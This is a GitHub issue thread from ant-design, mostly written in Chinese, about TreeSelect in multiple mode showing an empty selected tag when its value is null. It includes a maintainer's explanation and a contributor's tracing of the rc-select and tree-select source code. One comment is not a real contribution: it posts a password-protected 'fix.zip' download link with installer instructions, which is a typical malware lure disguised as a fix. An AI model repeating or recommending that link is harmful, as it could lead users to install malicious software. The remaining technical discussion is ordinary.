### ISSUE TITLE
TreeSelect组件多选模式下value设置为null时显示异常

### ISSUE THREAD

**Issue by insistence** [ant-design/ant-design#50578]
### Reproduction link

[![Edit on StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/edit/react-uvwusm?file=demo.js)

### Steps to reproduce

TreeSelect组件多选模式下value设置为null时显示一个已选的空选项

### What is expected?

TreeSelect组件多选模式下value设置为null时显示正常

### What is actually happening?

TreeSelect组件多选模式下value设置为null时显示一个已选的空选项

| Environment | Info |
| --- | --- |
| antd | 5.20.2 |
| React | 18.3.1 |
| System | Windows 11 |
| Browser | Edge 128 |

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by afc163** [comment]
> TreeSelect组件多选模式下value设置为null时显示正常

怎样算显示正常？

**Comment by insistence** [comment]
> > TreeSelect组件多选模式下value设置为null时显示正常
> 
> 怎样算显示正常？
![image](https://github.com/user-attachments/assets/2af9b8a7-4a22-4493-b96b-11096e578b94)

感谢快速回复，现在value为null时会显示一个空的已选项，希望value为null时和undefined一样不显示这个空的已选项

**Comment by afc163** [comment]
在 Select/TreeSelect 中我们视 null 为一个有意义的值，而非 undefined：https://github.com/ant-design/ant-design/issues/2367#issuecomment-232366869

**Comment by insistence** [comment]
> 在 Select/TreeSelect 中我们视 null 为一个有意义的值，而非 undefined：[#2367 (comment)](https://github.com/ant-design/ant-design/issues/2367#issuecomment-232366869)

感谢回复，比较疑惑的是单选模式下null值可以正常显示placeholder，多选模式下却显示一个空的已选项，感觉有些奇怪

**Comment by Wxh16144** [comment]
我试图去理解 select 代码的逻辑，发现也太复杂了，说说我看到的逻辑梳理一下。

先说关系： `<Select />` 组件，基于 `rc-select` 组件开发。 `rc-select` 提供了一个 [`<BaseSelect />`](https://github.com/react-component/select/blob/3927d01c795d7ed5caef083706ed5ce52fec0fd6/src/BaseSelect/index.tsx) 组件。该问题的 `<TreeSelect >` 也是基于该组件实现。（这里我只关注 `<BaseSelect />` 的 `displayValues` props 

 `<Select />`  的 options 支持 `null` 关键词，并且在 [源代码](https://github.com/react-component/select/blob/3927d01c795d7ed5caef083706ed5ce52fec0fd6/src/Select.tsx#L336-L346) 这里提到一嘴，如果受控的值为 `null` 并且 option 中 value 为 `null` 的 label 是 isNil 的，则会出现 placeholder。注意到 `<Select />` 再最外层处理了一次 value，也就是说在多选状态下，如果受控值是 null，则传递给  `<BaseSelect />` 的 `displayValues` props 为 `[]`

回到当前 `<TreeSelect >`  组件，多选情况下受控值为null，则会被视为 `[null]` 处理，也就是说传递给  `<BaseSelect />` 的 `displayValues` props 为 `[{ value: null, ...}]`。

> 比较疑惑的是单选模式下null值可以正常显示placeholder，多选模式下却显示一个空的已选项

`<TreeSelect >` 组件在单选模式下 确实有处理，逻辑和 `<Select />` ，一样，[详细代码在这里](https://github.com/react-component/tree-select/blob/23606d8e42dc4b69d6d209ac6d10daf6aaf684b5/src/TreeSelect.tsx#L454-L458)

`<TreeSelect >` 组件传递给`<BaseSelect />` 的 `displayValues` props  **永远都是一个数组**（这句结论不确定有没有遗漏掉其他边缘情况）

看到当前 issue 打上了 `improvement` 标签。不确定应该从什么地方去改进。

我目前改了一处，不确定对不对....

<img width="1021" alt="image" src="https://github.com/user-attachments/assets/68e0f88b-4044-477b-8ec1-0b379d52500a">
